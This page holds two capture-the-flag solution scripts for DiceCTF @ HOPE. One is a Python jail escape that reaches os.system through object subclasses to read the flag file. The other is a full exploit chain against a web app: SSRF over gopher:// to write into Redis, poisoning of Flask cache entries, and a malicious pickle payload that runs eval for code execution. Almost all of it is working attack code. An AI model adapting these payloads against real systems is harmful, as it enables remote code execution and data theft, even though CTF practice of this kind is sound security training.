https://ctftime.org/event/1706
- web / your-space
- misc / bonk
https://ctftime.org/event/1706
| # DiceCTF @ HOPE | |
| # https://ctftime.org/event/1706 | |
| # misc / bonk | |
| # 30 solves / 357 pts | |
| import string | |
| def gen_str(keyword: str) -> str: | |
| # {}.__doc__ | |
| doc = "dict() -> new empty dictionary\ndict(mapping) -> new dictionary initialized from a mapping object's\n (key, value) pairs\ndict(iterable) -> new dictionary initialized as if via:\n d = {}\n for k, v in iterable:\n d[k] = v\ndict(**kwargs) -> new dictionary initialized with the name=value pairs\n in the keyword argument list. For example: dict(one=1, two=2)" | |
| xs = [doc.index(c) for c in keyword] | |
| ys = [f'().__class__.__base__.__subclasses__()[133].__init__.__globals__.__doc__[{x}]' for x in xs] | |
| payload = ys[-1] | |
| for y in reversed(ys[: -1]): | |
| payload = f'{y}.__add__({payload})' | |
| return payload | |
| def skip_str(xs: str) -> str: | |
| ys = "" | |
| for x in xs: | |
| ys += x | |
| if x == "(": | |
| ys += "(" | |
| elif x == ")": | |
| ys += ")" | |
| elif x == "[": | |
| ys += "[" | |
| elif x == "]": | |
| ys += "]" | |
| elif x in string.digits: | |
| ys += "0" | |
| else: | |
| ys += "_" | |
| return ys | |
| # payload = f'().__class__.__base__.__subclasses__()[133].__init__.__globals__[{gen_str("system")}]({gen_str("ls")})' | |
| # print(skip_str(payload)) | |
| # # $ ls | |
| # # flag.2686924749.txt | |
| # # run | |
| payload = f'().__class__.__base__.__subclasses__()[133].__init__.__globals__[{gen_str("system")}]({gen_str("cat flag.*.txt")})' | |
| print(skip_str(payload)) | |
| # $ cat flag.*.txt | |
| # hope{c0ntrived_and_us3less_but_st1ll_kinda_cool?} |
| # DiceCTF @ HOPE | |
| # https://ctftime.org/event/1706 | |
| # web / your-space | |
| # 7 solves / 469 pts | |
| # My exploitation: | |
| # * SSRF via Gopher protocol to set an arbitrary value in Redis | |
| # * Limitation: url length <= 96 | |
| # * Cache poisoning for the result of `@cache.memoize`, which uses Redis internally | |
| # * RCE in `picle.loads` to get a flag value from `__import__("sys").modules["app"]` | |
| import pickle | |
| import urllib.parse | |
| import httpx | |
| import string | |
| import random | |
| import time | |
| # BASE_URL = "http://localhost:8000" | |
| BASE_URL = "https://web-your-space-fb877a3481335bd5.mc.ax" | |
| def make_gopher(payload: str) -> str: | |
| return "gopher://redis:6379/_" + urllib.parse.quote(payload) | |
| def gen_delete_payload(key: bytes) -> str: | |
| key_str = key.decode() | |
| return make_gopher(f'DEL {key_str}') | |
| def gen_append_payload(key: bytes, value: bytes) -> str: | |
| key_str = key.decode() | |
| # value_str = "".join(["\\x" + hex(c)[2:].zfill(2) for c in value]) | |
| value_str = str(value)[2:-1].replace('"', '\\"') | |
| return make_gopher(f'APPEND {key_str} "{value_str}"') | |
| def gen_rename_payload(key1: bytes, key2: bytes) -> str: | |
| key1_str = key1.decode() | |
| key2_str = key2.decode() | |
| return make_gopher(f'RENAME {key1_str} {key2_str}') | |
| def gen_payloads(key: bytes, value: bytes, limit: int) -> list: | |
| tmp_key = b"x" | |
| payloads = [] | |
| payloads.append(gen_delete_payload(tmp_key)) | |
| payloads.append(gen_delete_payload(key)) | |
| offset = 0 | |
| while offset < len(value): | |
| exists = False | |
| for l in reversed(range(1, len(value) - offset + 1)): | |
| payload = gen_append_payload(tmp_key, value[offset:offset+l]) | |
| if len(payload) <= limit: | |
| payloads.append(payload) | |
| offset += l | |
| exists = True | |
| break | |
| assert exists | |
| payloads.append(gen_rename_payload(tmp_key, key)) | |
| return payloads | |
| key = b"aaaaaa" | |
| assert len(key) == 6 | |
| memver_key = b"flask_cache_app.routes.space.num_subscriptions_memver" | |
| memver_body = b'!' + pickle.dumps(key.decode()) | |
| class FLAG: | |
| def __reduce__(self): | |
| return eval, ('__import__("sys").modules["app"].flag',) | |
| evil = FLAG() | |
| cache_key = b"flask_cache_xk28vUr8TTGcOgNT" + key | |
| cache_body = b'!' + pickle.dumps(evil) | |
| limit = 96 | |
| payloads = gen_payloads(memver_key, memver_body, limit) + gen_payloads(cache_key, cache_body, limit) | |
| def create_user(client: httpx.Client): | |
| username = "".join(random.choice(string.ascii_letters) for _ in range(10)) | |
| password = "".join(random.choice(string.ascii_letters) for _ in range(10)) | |
| res = client.post( | |
| f"{BASE_URL}/register", | |
| data={ | |
| "username": username, | |
| "password": password, | |
| }, | |
| follow_redirects=False, | |
| ) | |
| assert res.status_code == 302, res | |
| def create_space(client: httpx.Client): | |
| name = "".join(random.choice(string.ascii_letters) for _ in range(10)) | |
| res = client.post( | |
| f"{BASE_URL}/create", | |
| data={ | |
| "name": name, | |
| }, | |
| follow_redirects=False, | |
| ) | |
| assert res.status_code == 302, res | |
| return f'{BASE_URL}{res.headers["Location"]}' | |
| def set_webhook(client: httpx.Client, url: str): | |
| res = client.post( | |
| f"{BASE_URL}/profile", | |
| data={ | |
| "webhook": url, | |
| }, | |
| follow_redirects=False, | |
| ) | |
| assert res.status_code == 200, res | |
| def subscribe_space(client: httpx.Client, space_url: str): | |
| res = client.get( | |
| f"{space_url}/sub", | |
| follow_redirects=False, | |
| ) | |
| assert res.status_code == 302, res | |
| def post_to_space(client: httpx.Client, space_url: str): | |
| content = "".join(random.choice(string.ascii_letters) for _ in range(10)) | |
| res = client.post( | |
| f"{space_url}/post", | |
| data={ | |
| "content": content, | |
| }, | |
| follow_redirects=False, | |
| ) | |
| assert res.status_code == 302, res | |
| with httpx.Client() as main_client: | |
| create_user(main_client) | |
| space_url = create_space(main_client) | |
| print(space_url) | |
| for payload in payloads: | |
| with httpx.Client() as sub_client: | |
| create_user(sub_client) | |
| set_webhook(sub_client, payload) | |
| subscribe_space(sub_client, space_url) | |
| post_to_space(main_client, space_url) | |
| for i in range(100): | |
| time.sleep(1) | |
| print(f"{i = }") | |
| res = main_client.get(space_url) | |
| assert res.status_code == 200, res | |
| if "{" in res.text: | |
| # Get a flag | |
| print([line for line in res.text.splitlines() if "{" in line]) | |
| break |